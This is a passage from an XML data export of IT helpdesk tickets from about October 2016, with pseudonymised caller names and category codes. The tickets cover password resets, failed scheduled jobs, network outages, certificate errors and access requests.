    <s v="pollaurid is unable to enable sp on an account without getting an error indicating there are potential duplicates. the account is different than the other 31 but does use the same email address, which i believe dup detection is based off of. when he attempts to save anyways, he get a business process error.  pls refer to  account #81184849 as an example as well as the attached screen shots."/>
    <s v="msarjyhi fpxdbeno"/>
    <x v="39"/>
  </r>
  <r>
    <s v="issue in viewing pay statements in hr_tool "/>
    <s v="it appears that i have a browser issue in viewing pay statements in hr_tool (see emails below).  are you able to help me to view these screens?_x000d__x000a__x000d__x000a_               "/>
    <s v="qfcxbpht oiykfzlr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="global_telecom_1 number "/>
    <s v="global_telecom_1 number "/>
    <s v="msarjyhi fpxdbeno"/>
    <x v="0"/>
  </r>
  <r>
    <s v="telephony_software password reset"/>
    <s v="good morning, need a password reset for telephony_software for  - vfjsubao yihelxgp _x000a__x000a_id: taylthyuoaj_x000a__x000a_workstation: ldgl8513929 _x000a_"/>
    <s v="vfjsubao yihelxgp"/>
    <x v="6"/>
  </r>
  <r>
    <s v="printer not printing"/>
    <s v="printer not printing"/>
    <s v="plqbesvo uopaexic"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cad team code - characteristic"/>
    <s v="can you please add &quot;manuf eng â€“ us_plant&quot; ?_x000d__x000a_"/>
    <s v="ctvaejbo mjcerqwo"/>
    <x v="10"/>
  </r>
  <r>
    <s v="minitab license issue - cannot run minitab as of early am 10/3/2016"/>
    <s v="minitab license issue - cannot run minitab as of early am 10/3/2016.  minitab throws a license server not found error.  this is affecting production in the usa site. "/>
    <s v="slzhuipc sqntcber"/>
    <x v="2"/>
  </r>
  <r>
    <s v="hr_tool time application - this morning i do not have the my time stamp selection on my timecard.  i cannot log in and clock"/>
    <s v="hr_tool time application - this morning i do not have the my time stamp selection on my timecard.  i cannot log in and clock in.  i was here on time this morning and i cannot clock myself in. local it stefyty dabhruji already looked at it, appears there is something wrong with my account of the application. _x000a_phone _x000a_email ylfqrzxg.jmakitug@gmail.com_x000a__x000a_"/>
    <s v="ylfqrzxg jmakitug"/>
    <x v="0"/>
  </r>
  <r>
    <s v="crm issue for iphone"/>
    <s v="_x000d__x000a__x000d__x000a_received from: zfburidj.jmilguev@gmail.com_x000d__x000a__x000d__x000a_hi there,_x000d__x000a__x000d__x000a_i am trying to set up crm on my iphone and it asks for the company's crm address - what is it?_x000d__x000a__x000d__x000a_"/>
    <s v="zfburidj jmilguev"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="password reset"/>
    <s v="ygdrujzi rvyjdlwb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="url not working"/>
    <s v="url not working"/>
    <s v="mxifcasu cxsembup"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password_management_tool password manager change?"/>
    <s v="_x000d__x000a__x000d__x000a_received from: hpqjaory.gfrwmije@gmail.com_x000d__x000a__x000d__x000a_can someone please advise if we are still utilizing password_management_tool password manager?_x000d__x000a__x000d__x000a_i can't connect to this site to do a mass update of my new password to all accounts._x000d__x000a__x000d__x000a_"/>
    <s v="hpqjaory gfrwmije"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for qwsjptlo hnlasbed using password_management_tool password reset."/>
    <s v="the"/>
    <s v="goaxzsql qpjnbgsa"/>
    <x v="16"/>
  </r>
  <r>
    <s v="reset passwords for qwsjptlo hnlasbed using password_management_tool password reset."/>
    <s v="the"/>
    <s v="goaxzsql qpjnbgsa"/>
    <x v="16"/>
  </r>
  <r>
    <s v="business_client issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: eqtofwbm.mojfbwds@gmail.com_x000d__x000a__x000d__x000a_hi it support,_x000d__x000a__x000d__x000a_one of our users have problem with running of business_client client. he is still getting error message that net framdntyework is not installed on your pc. i tried to reinstall it but no success._x000d__x000a__x000d__x000a_is it known issue? please can you help us how to solve it?_x000d__x000a__x000d__x000a_"/>
    <s v="eqtofwbm mojfbwds"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hardware item coming wrong  in labeling in warehouse_tool ."/>
    <s v="please change erp logic that currently identifies hardware items for warehouse_tool to include rqfhiong zkwfqagb classification of hdw, see attached email. assign to vamthrsee krisyuhnyrt"/>
    <s v="tzbqlfao dhlbputy"/>
    <x v="20"/>
  </r>
  <r>
    <s v="problem opening the password_management_tool password manager"/>
    <s v="_x000d__x000a__x000d__x000a_received from: jmrukcfq.rdyuxomp@gmail.com_x000d__x000a__x000d__x000a_the screenshot below is the message i received when i tried to open the password_management_tool password manager site this morning to reset my password.   please advise._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="jmrukcfq rdyuxomp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage: india carrier, company-ap-ind-carrier-891-dmvpn-rtr01 is down at 7am et on 10/03. site is up on secondary."/>
    <s v="what type of outage:  _____network     x_____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    _no________     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _7am et on 10/03_____________________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? no_______    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? _no______    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  yes______    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ______yes__     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ____na_______   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    __na___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tyeofsk rdyzpwhi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="passwords to be reset for erp SID_34"/>
    <s v="_x000d__x000a__x000d__x000a_received from: dpuifqeo.eglwsfkn@gmail.com_x000d__x000a__x000d__x000a_please reset the following passwords in erp SID_34 â€“ us_plant employees_x000d__x000a__x000d__x000a_knemilvx dvqtziya_x000d__x000a_nabjwvtd sprhouiv_x000d__x000a_"/>
    <s v="dpuifqeo eglwsfkn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset the password for jmusidzr sratdeol on erp / production / hcm"/>
    <s v="reset the password for jmusidzr sratdeol on erp / production / hcm"/>
    <s v="jmusidzr sratdeol"/>
    <x v="0"/>
  </r>
  <r>
    <s v="united kingdom has problems with making outbound calls"/>
    <s v="united kingdom has issues with making outbound calls._x000d__x000a_this is on the telephony_software as on the siemens pbx. "/>
    <s v="zmgsfner caltmgoe"/>
    <x v="6"/>
  </r>
  <r>
    <s v="a user was able to add a zj partner in SID_34 and they don't have security to do so.  please advise how this can be fixed."/>
    <s v="someone in the service center was able to successfully add a zj partner to an existing customer master account in SID_34._x000d__x000a_we set it up that only the 9 users assigned to the sd:cust_mast_partner_func_zj role would have add/edit/delete access to this partner function._x000d__x000a_here is a summary of what happened per lillanna:_x000d__x000a_he (ujxvrlzg pkaegicn) was using SID_34 ecc. what is strange is that the system gave him a warning that he is not allowed to add zj partner function. he could not even save changes until he cleared the zj field. but it seems the system added the zj partner function anyway when he saved the account.  (the account was 81030623 and he added zj partner of 81907354.)_x000d__x000a__x000d__x000a_"/>
    <s v="nkthumgf mwgdenbs"/>
    <x v="12"/>
  </r>
  <r>
    <s v="pos data -  september, 2016."/>
    <s v="please provide pos data for the month of september '16._x000d__x000a__x000d__x000a_"/>
    <s v="mxawhbun siyqthel"/>
    <x v="8"/>
  </r>
  <r>
    <s v="password reset "/>
    <s v="_x000a__x000a_from: nwfodmhc exurcwkm _x000a_sent: monday, october 03, 2016 3:26 pm_x000a_to: 'shivakuhdty.s@company.com'_x000a_cc: tiyhum kuyiomar_x000a_subject: password reset _x000a__x000a_hi shivakuhdty,_x000a__x000a_your account was locked out, we unlocked your account. please try login with your existing password as you are ess user we have not changed your password. please replay back if you have any issue._x000a__x000a_"/>
    <s v="vfitdsyk lpezkyqx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook security certificate notification"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vsiemxgh.lgeciroy@gmail.com_x000d__x000a__x000d__x000a_dear sir / mam,_x000d__x000a__x000d__x000a_kindly refer below screenshot where this notification is prompting again and again._x000d__x000a__x000d__x000a_[cid:image001.jpg@01SID_35d7d.f769a8a0]_x000d__x000a__x000d__x000a_best "/>
    <s v="vsiemxgh lgeciroy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="sales office mw01 is not defined for sales area 1409 0sartlgeo lhqksbdx0"/>
    <s v="when we opened new order  35093500 we got communicate tahat order is incomplete._x000d__x000a_sale office is not determinated. when we try enter right sales office mw01  - i can't add the chanhes_x000d__x000a_print screen in attached"/>
    <s v="ylitqvaj ljxdfhus"/>
    <x v="12"/>
  </r>
  <r>
    <s v="job Job_593 failed in job_scheduler at: 10/03/2016 04:04:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_593 failed in job_scheduler at: 10/03/2016 04:04:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="issue is not resolved. error : @80@validity of certificate from list with pse &gt; ssl"/>
    <s v="browser:microsoft internet explorer_x000a_email:gqcyomwf.opjaiwcu@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:erp error:_x000a__x000a_@80@validity of certificate from list with pse &gt; ssl_x000a_client (standard) &lt; ends in 2 days,"/>
    <s v="gqcyomwf opjaiwcu"/>
    <x v="13"/>
  </r>
  <r>
    <s v="reset the password for dqowbefk prgxwzco on erp / production / hcm"/>
    <s v="i've just changed my all passwords because of expiration but erp does not accept the new password, it says that the name and password is not correct. please fix it , "/>
    <s v="dqowbefk prgxwzco"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering tool - erp system message"/>
    <s v="a few users have reported the seeing the attached error message today regarding certificate validity,_x000d__x000a_"/>
    <s v="ctvaejbo mjcerqwo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bex analyzer and bex designer is not working."/>
    <s v="bex analyzer and bex designer is not working."/>
    <s v="oncidblt ucewizyd"/>
    <x v="18"/>
  </r>
  <r>
    <s v="erpsys- certificate errors"/>
    <s v="_x000a__x000a_received from: qgrbnjiu.hidzlfma@gmail.com_x000a__x000a_hi_x000a__x000a_i have just started having below system massage and it prompts every time i move from erp nord to nord, bothering me. please advise what this is about, and what should i do on this?_x000a__x000a_[cid:image001.png@01SID_35d90.73d9b7b0]_x000a__x000a__x000a__x000a_qgrbnjiu hidzlfma_x000a_manager, warehouse &amp; distribution _x000a_qgrbnjiu.hidzlfma@gmail.com&lt;mailto:qgrbnjiu.hidzlfma@gmail.com&gt;_x000a__x000a__x000a__x000a_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a_[#+company/posts&gt;  [_x000a_select the following link to view the disclaimer in an alternate language. "/>
    <s v="hgcrtxez azoeingw"/>
    <x v="13"/>
  </r>
  <r>
    <s v="office has to be upgraded to 2016"/>
    <s v="office has to be upgraded to 2016"/>
    <s v="lanigpkq qzhakunx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for bxeagsmt zrwdgsco using password_management_tool password reset."/>
    <s v="the"/>
    <s v="bxeagsmt zrwdgsco"/>
    <x v="16"/>
  </r>
  <r>
    <s v="reset passwords for bxeagsmt zrwdgsco using password_management_tool password reset."/>
    <s v="the"/>
    <s v="bxeagsmt zrwdgsco"/>
    <x v="16"/>
  </r>
  <r>
    <s v="look for identifying the root cause &amp; solution - inter-co intransit  8058329437"/>
    <s v="dn 9169430548 has been received on august 11, 2014 but the same dn, mm#, qty have arrived on october 3, 2016. duplicated. please help finding the root cause why the duplicated dn could have been pgi'd. since the dn was already received, plant_317 is not able to perform the gr against this intransit, please provide the best solution to process the gr."/>
    <s v="hgcrtxez azoeingw"/>
    <x v="17"/>
  </r>
  <r>
    <s v="engineering_tool not working"/>
    <s v="hello_x000a__x000a_please support our dealer for engineering_tool installation. contact details below:_x000a__x000a__x000a_best "/>
    <s v="sihtvocw yspnqxgw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="server access rights for hpmjtgik blrmfvyh"/>
    <s v="help desk_x000d__x000a__x000d__x000a_please usa an access right to hpmjtgik blrmfvyh to following folder :_x000d__x000a__x000d__x000a_\\HostName_47\departments\finance_x000d__x000a__x000d__x000a_she is new staff for eh japan / finance department and i am her reportncqulao qauighdpnager._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="wgpimkle kijhcwur"/>
    <x v="11"/>
  </r>
  <r>
    <s v="access to m drive"/>
    <s v="please provide access to mtb mt sales drive ._x000d__x000a__x000d__x000a_for any clarification pl call me back_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="enhjdypo rsbxiepn"/>
    <x v="11"/>
  </r>
  <r>
    <s v="your mobile device is temporarily blocked from synchronizing using exchange activesync until your administrator usas i"/>
    <s v="personal device._x000d__x000a__x000d__x000a_"/>
    <s v="qlurtxzs qalsvutw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="lbxugpjw cnmfbdui-mobile phone changed"/>
    <s v="_x000d__x000a__x000d__x000a_received from: lbxugpjw.cnmfbdui@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a__x000d__x000a_i changed my mobile phone and below informations belong to my own personal phone.could you provide to use my new mobile phone device for mails._x000d__x000a__x000d__x000a_"/>
    <s v="lbxugpjw cnmfbdui"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network outage:russia russia - warehouse network is down since 12:35 am et on 10/03/16 "/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   __________12:35 am et on 10/03/16 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_no__    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ___na_____     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  ___yes______     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ______na_____   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    _____no______    (yes/no/na) _x000d__x000a__x000d__x000a_10. verified site working on backup circuit ?  _____na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x v="7"/>
  </r>
  <r>
    <s v="account expired- vvamirsdwnp - pallutyr not able to log-in"/>
    <s v="from: kuhyndan lalthy _x000a_sent: monday, october 03, 2016 9:52 am_x000a_to: nwfodmhc exurcwkm_x000a_cc: qjgnkhso vahgolwx_x000a_subject: re: user id : vvamirsdwnp - pallutyr not able to log-in_x000a__x000a_pallutyr who is having user id vvamirsdwnp not able to log-in the window etc. can you check it urgently? kindly provide access upto december 31, 2016._x000a__x000a_"/>
    <s v="dntxagwc whfdqxcs"/>
    <x v="19"/>
  </r>
  <r>
    <s v="lehsm012 &amp; lehsm013 are down at at usa company  since 4:16 am on 10/01 et"/>
    <s v="lehsm012 &amp; lehsm013 are down since 4:16 am on 10/01 et"/>
    <s v="jloygrwh acvztedi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="network port not working"/>
    <s v="network port is not work and wifi network is very poor"/>
    <s v="whavkycs unihdlfy"/>
    <x v="18"/>
  </r>
  <r>
    <s v="unable to post billing to account - billed quantity 0"/>
    <s v="unable to post billing to account - billed quantity 0_x000d__x000a__x000d__x000a_1325 ic5314 i 27.09.2016 ziv vvsallz 28.09.2016 ic5314 0159216101_x000d__x000a_1325 ic5314 i 29.09.2016 ziv oprbatch 29.09.2016 ic5314 0159225544_x000d__x000a_"/>
    <s v="lckagtry xcrmzgli"/>
    <x v="12"/>
  </r>
  <r>
    <s v="need help in changing password on password_management_tool"/>
    <s v="need help in changing password on password_management_tool"/>
    <s v="aguxobqs upgtdafh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="volume: c:\ label:sys-lhqsm68356 543aa385 on server: lhqsm68356 is over "/>
    <s v="volume: c:\ label:sys-lhqsm68356 543aa385 on server: lhqsm68356 is over _x000a_85% space consumed. space available: 4.2 g "/>
    <s v="jloygrwh acvztedi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="job bkwin_search_server_prod_daily failed in job_scheduler at: 10/02/2016 23:20:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkwin_search_server_prod_daily failed in job_scheduler at: 10/02/2016 23:20:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u2 failed in job_scheduler at: 10/02/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u2 failed in job_scheduler at: 10/02/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u6 failed in job_scheduler at: 10/02/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u6 failed in job_scheduler at: 10/02/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u1 failed in job_scheduler at: 10/02/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u1 failed in job_scheduler at: 10/02/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="reset passwords for prgewfly ndtfvple using password_management_tool password reset."/>
    <s v="the"/>
    <s v="prgewfly ndtfvple"/>
    <x v="16"/>
  </r>
  <r>
    <s v="HostName_206:volume: /dev/SID_56ora is over 98% space consumed. "/>
    <s v="HostName_206: volume: /dev/SID_56ora on server: HostName_206 is over 98% space consumed. space available: 491 m"/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="1"/>
  </r>
  <r>
    <s v="always upservice.exe is not running on HostName_521"/>
    <s v="always upservice.exe is not running on HostName_521"/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="13"/>
  </r>
  <r>
    <s v="wireless outage again-taiwan 1003"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ticqvhal.vgokzesi@gmail.com_x000d__x000a__x000d__x000a_hello~_x000d__x000a__x000d__x000a_wireless(companysecure) outage of taiwan._x000d__x000a_please help~_x000d__x000a__x000d__x000a_"/>
    <s v="ticqvhal vgokzesi"/>
    <x v="3"/>
  </r>
  <r>
    <s v="job Job_2549 failed in job_scheduler at: 10/02/2016 20:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2549 failed in job_scheduler at: 10/02/2016 20:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job Job_562 failed in job_scheduler at: 10/02/2016 17:36:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_562 failed in job_scheduler at: 10/02/2016 17:36:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="zifujpvr vxfkwaqh"/>
    <s v="_x000d__x000a__x000d__x000a_received from: makiosjc.kxapdhnm@gmail.com_x000d__x000a__x000d__x000a_zifujpvr vxfkwaqh's email is not working. can i get an update on this?  his email is still not working._x000d__x000a__x000d__x000a_"/>
    <s v="makiosjc kxapdhnm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3049 failed in job_scheduler at: 10/02/2016 13:56:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3049 failed in job_scheduler at: 10/02/2016 13:56:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job snp_heu_2_regen failed in job_scheduler at: 10/02/2016 12:20:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job snp_heu_2_regen failed in job_scheduler at: 10/02/2016 12:20:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="email not working - &quot;the server couldn't be contacted&quot; message"/>
    <s v="contact phone - _x000a_company email not working - &quot;the server couldn't be contacted&quot; error message_x000a_owa also not working"/>
    <s v="zifujpvr vxfkwaqh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ie browser issue : website not loading its contents completely"/>
    <s v="ie browser issue : website not loading its contents completely"/>
    <s v="epqyourg rxjipfum"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job bwhrattr failed in job_scheduler at: 10/02/2016 10:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bwhrattr failed in job_scheduler at: 10/02/2016 10:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="frequent account lock out "/>
    <s v="frequent account lock out _x000d__x000a_ran lock out status.._x000d__x000a_account was getting locked out from one of the wifi devices.._x000d__x000a_took control of machine and started credential manager services.._x000d__x000a_deleted bunch of passwords saved in credential manager .._x000d__x000a_asked user to remove company secure from mobile device and keep wifi disabled for couple of days..and can enable it when at home._x000d__x000a_also undocked computer and docked it back ..tried login in..it worked..._x000d__x000a_locked system and unlocked it with no difficulty.._x000d__x000a_keeping account/ticket under observation._x000d__x000a_arranging call back tomorrow as i will be ooo. "/>
    <s v="mrduhsci xmvkzqja"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cannot access mail from any device using owa or outlook"/>
    <s v="i lost access to mail on 9/29.  i went in and checked the o365 setting for my account and found the error attached (error1) on my account.  i removed my e5 license and applied and e4 to see if that would resolve the issue but i still can't get into my email.  if i try accessing my account via owa i get attrachment error2_x000d__x000a__x000d__x000a_this may be an issue with all e5 licenses, they have all expired.  i cannot receive email so i will not receive any replies or emails concerning this ticket."/>
    <s v="sdxjiwlq ynowzqfh"/>
    <x v="26"/>
  </r>
  <r>
    <s v="reminder for approval of requisition 01453742 , already approved this request in erp"/>
    <s v="reminder for approval of requisition 01453742 , already approved this request in erp"/>
    <s v="oydlehun svnfrxdk"/>
    <x v="29"/>
  </r>
  <r>
    <s v="job Job_3049 failed in job_scheduler at: 10/02/2016 03:37:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3049 failed in job_scheduler at: 10/02/2016 03:37:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_3051 failed in job_scheduler at: 10/02/2016 03:39:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3051 failed in job_scheduler at: 10/02/2016 03:39:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_ap1 failed in job_scheduler at: 10/02/2016 01:28:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_ap1 failed in job_scheduler at: 10/02/2016 01:28:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="only erp running slow in Israel.internet is working fine."/>
    <s v="only erp running slow._x000a_internet is working fine._x000a__x000a_all transactions are running slow._x000a_contact # :_x000a_erp system : SID_34 (all transactions)_x000a__x000a_checking with dac team._x000a_"/>
    <s v="wqfzjycu omleknjd"/>
    <x v="13"/>
  </r>
  <r>
    <s v="job Job_1142 failed in job_scheduler at: 10/02/2016 00:14:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1142 failed in job_scheduler at: 10/02/2016 00:14:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job mm_zscr0099_wkly_qux1 failed in job_scheduler at: 10/02/2016 00:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job mm_zscr0099_wkly_qux1 failed in job_scheduler at: 10/02/2016 00:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_keheu1 failed in job_scheduler at: 10/02/2016 00:09:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_keheu1 failed in job_scheduler at: 10/02/2016 00:09:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="want to make sure if erp is in maintenance right now"/>
    <s v="name:kvrmnuix yicpojmf_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:qiwthyang@company.com_x000a_customer number:_x000a_telephone:_x000a_summary:cannot connect to company server"/>
    <s v="kvrmnuix yicpojmf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1665 failed in job_scheduler at: 10/01/2016 18:25:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1665 failed in job_scheduler at: 10/01/2016 18:25:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job oemcold failed in job_scheduler at: 10/01/2016 15:09:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job oemcold failed in job_scheduler at: 10/01/2016 15:09:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1108w failed in job_scheduler at: 10/01/2016 15:09:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1108w failed in job_scheduler at: 10/01/2016 15:09:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_3049 failed in job_scheduler at: 10/01/2016 14:26:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3049 failed in job_scheduler at: 10/01/2016 14:26:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="call conference to nahytu"/>
    <s v="call conference to nahytu"/>
    <s v="oxlqvika zrvbahym"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset alert from o365"/>
    <s v="password reset alert from o365"/>
    <s v="icyxtqej lqsjrgzt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the e-mail account of horeduca ogrhivnm has come up in my outlook folders."/>
    <s v="this is a serious breach of security as she is in hr. please correct immediately"/>
    <s v="rozsyfai zncajubh"/>
    <x v="26"/>
  </r>
  <r>
    <s v="reset passwords for wxdvjoct ckxwtoam using password_management_tool password reset."/>
    <s v="the"/>
    <s v="wxdvjoct ckxwtoam"/>
    <x v="16"/>
  </r>
  <r>
    <s v="when trying to hit the one note button on existing crm opportunities, it gives attached errir message "/>
    <s v="ms crm dynamics issue : collaboration_platform not mfg_toolting with crm_x000d__x000a_enabled collaboration_platform and collaboration_platform mfg_tooltion: saved changes, no go_x000d__x000a_added site to compatibility mode , reset , cleared cookies cache ..no go..._x000d__x000a_ user not really sure if this worked before in past."/>
    <s v="msarjyhi fpxdbeno"/>
    <x v="39"/>
  </r>
  <r>
    <m/>
    <s v="_x000d__x000a__x000d__x000a_received from: ohdrnswl.rezuibdt@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_link is not working. kindly resolve yhe issue on urgent basis._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="ohdrnswl rezuibdt"/>
    <x v="33"/>
  </r>
  <r>
    <s v="reset passwords for ytzpxhql ntfxgpms using password_management_tool password reset."/>
    <s v="the"/>
    <s v="ytzpxhql ntfxgpms"/>
    <x v="16"/>
  </r>
  <r>
    <s v="erp password reset : SID_37"/>
    <s v="erp password reset : SID_37"/>
    <s v="msarjyhi fpxdbeno"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn issue "/>
    <s v="_x000a_summary:i can not log into the vpn for na"/>
    <s v="vsbtygin oufhtbas"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows account was locked out : unlocked account"/>
    <s v="windows account was locked out : unlocked account"/>
    <s v="jqxtbspr mpfdivlh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering_tool installation for sathyrui shiragavi user id :; cpinsety01 and cpinsety02 channel partner  - inspiron enterprise"/>
    <s v="replied to email sending instructions how to install engineering_tool"/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v=" problem when clicking on the shop link in purchasing when using internet explorer."/>
    <s v="_x000a_from: alkuozfr bhqgdoiu _x000a_sent: saturday, october 01, 2016 4:35 pm_x000a_to: zbpdhxvk nowxjztk; mpihysnw wrctgoan_x000a_cc: aghynilthykurtyar  gorlithy; inxsupmy zhwmifvx; oxlqvika zrvbahym; rujteoza mcoswhjuanthila; dctviemg muapxkns; wfgtyill hannathry; nwfodmhc exurcwkm_x000a_subject: re: ie issues encountered_x000a__x000a_all,_x000a_i am getting this problem when clicking on the shop link in purchasing when using internet explorer._x000a_there is an error message that pops up. i should get a list of the catalogs but i do not._x000a_it sends me to the below screen (second screen shot). not sure if this is my problem or more widespread_x000a_"/>
    <s v="idlupnzr nkxylwrc"/>
    <x v="29"/>
  </r>
  <r>
    <s v="reisekostenabrechnung in erp nicht mÃ¶glich!"/>
